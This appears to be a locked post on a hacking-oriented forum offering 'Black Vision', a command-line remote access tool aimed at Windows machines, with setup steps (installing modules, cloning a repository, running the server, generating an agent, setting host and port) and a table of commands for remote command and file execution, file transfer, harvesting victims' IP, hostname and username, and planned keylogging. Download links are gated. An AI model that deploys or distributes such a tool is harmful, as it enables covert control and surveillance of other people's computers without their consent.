Jump to content
YOUR-AD-HERE
HOSTING
TOOLS

Locked Black Vision [ Command line Remote Access tool targeting Windows Systems ]


dEEpEst

Recommended Posts

Black Vision
This is the hidden content, please

Command line Remote Access tool targeting Windows Systems.

Download Maxmind GeoIP2 Database from here ; 
This is the hidden content, please
Extract the file under blackvision/

How to use

Install required modules

pip3 install -r requirements.txt

Run server

git clone https://github.com/lynxmk/blackvision.git
cd blackvision
python3 main.py

Generate Agent

cd blackvision
python3 generate.py

Change Host/Port

Open settings.ini. And change host, port.

Commands
Command Purpose
transfer Transfer a NON Binary file.
bsendfile Transfer a Binary File.
kill Kill the connection
info View Information of client.
msgbox Send Messageboxes.
exec Execute a Command on the remote Machine(s).
exec-file Execute a file on the remote Machine(s).
wanip View WAN IP of Remote Machine(s).
hostname View Hostname of Remote Machine(s).
username View Username of Remote Machine(s).
monitoroff Turn of monitor of Remote Machine(s).
monitoron Turn monitor back on.
cdopen Eject CDROM of Remote Machine(s).
cdclose Close CDROM of Remote Machine(s).
playaudio Play Audio stream on Remote Machine(s).
send Send commands to 1 client. (NO broadcast)
keydump DUMP Keystroke buffer (Not added yet)
Termux Compatibilty

This app is compatible with Termux. Run it the same way you run it in Terminal.

TODO

  • Rewrite Agent in C.
  •  Fix sending file to single client. (Fixed)
  •  Fix multiple clients information saving. (Fixed)
  • Add keylogging.
  •  Fix that args[3] does not get sent. (Fixed)
  • Fix Broken connection problems.

Video Example:

This is the hidden content, please

Download:

This is the hidden content, please

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.